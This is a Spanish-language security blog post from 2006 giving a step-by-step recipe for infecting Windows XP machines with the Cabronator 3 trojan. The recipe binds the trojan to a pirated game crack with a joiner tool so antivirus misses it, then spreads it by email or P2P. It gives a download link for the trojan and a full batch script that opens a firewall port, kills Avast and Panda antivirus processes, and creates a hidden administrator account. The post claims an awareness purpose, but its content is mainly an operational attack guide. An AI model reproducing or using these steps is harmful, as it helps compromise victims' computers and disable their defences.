En este blog informático está reflejada mi experiencia en el mundo de la informática. Mis publicaciones serán sobre seguridad informática e Internet. Las técnicas y herramientas aquí explicadas son para fomentar la seguridad de la información dentro de la filosofía del hacking ético. En línea desde 2005.

Infectar un sistema fácilmente con un troyano.

Este post no es para fomentar la piratería, es un ejemplo de lo importante que es ejecutar archivos que no sabemos de donde proceden.

Pasos para preparar la infección para Windows XP SP2:

1º Buscamos un troyano, son fáciles de encontrar, google es nuestro mejor aliado. En este caso e usado uno muy sencillo y eficaz Cabronator 3.

2º Buscamos un Joiner, una herramienta que sirve para juntar los archivos ejecutables y hacer que uno se ejecute visible y otros invisibles. En este caso e usado Cactus Joiner 2.0 sacado de elhacker, un joiner que permite juntar 25 archivos y encryptarlos de forma que un antivirus no puede detectar virus adjuntos, hasta el momento de su ejecución.

3º Un cebo, un crack de algún juego que este de moda. Este crack será lo que juntemos con el troyano y un archivo bat para hacer mas eficaz el troyano.

4º Nos preparamos un bat que pueda abrir los puertos del troyano y desactive el antivirus. El bat del ejemplo solo desactiva el Panda y el Avast! pero se puede hacer con todos los antivirus.
Ejemplo:

:Esta linea abre el puerto del troyano en el firewall de windows Xp
netsh firewall set portopenig tcp 5555 tcp5555 enable

:Estas lineas desactivan el antivirus Avast!
taskkill /f /im ashserv.exe
taskkill /f /im ashdisp.exe
taskkill /f /im ashmaisv.exe
net stop avast! Antivirus
net stop avast! iAVS4 Control Service
net stop avast! Mail Scanner
net stop avast! Web Scanner

:Estas el Panda
taskkill /f /im APVXDWIN.EXE
net stop Panda anti-virus service

:Estas crean el usuario Alvaro con contraseña hola y le da privilegios
net user Alvaro hola /add
net localgroup administradores Alvaro /add

5º Despues juntamos el bat, el troyano y el cebo con el joiner y elegimos que todo se ejecute oculto menos el cebo en este caso un crack de un juego.

6º Solo nos queda un medio de difusión: e-mail, emule …

Este es un modelo de infección muy básico, aunque el joiner oculte el troyano cuando se descomprima el antivirus lo detectaría, pero al ejecutarse el bat desactiva el antivirus, con el inconveniente de que cuando se reinicie la maquina el antivirus se volverá activar y encontrara el virus.
Este post es para explicar porque no se deben ejecutar archivos adjuntos de correos electrónicos de fuentes desconocidas o archivos ejecutables descargados de sitios que no son de confianza.

Cactus Joiner 2.0
http://foro.elhacker.net/index.php/topic=131276.0.html

Troyano Cabronator 3 información:
http://www.perantivirus.com/sosvirus/virufamo/cabronat.htm

Troyano Cabronator 3 descarga:
http://kakoweb.iespana.es/kakoweb/files/CaBrONaToR3KiLL.zip
Infectar un sistema fácilmente con un troyano. Infectar un sistema fácilmente con un troyano. Reviewed by Álvaro Paz on miércoles, agosto 23, 2006 Rating: 5
Publicar un comentario en la entrada
Este Blog sobre Seguridad Informática está bajo una licencia de Creative Commons, Álvaro Paz. Con la tecnología de Blogger.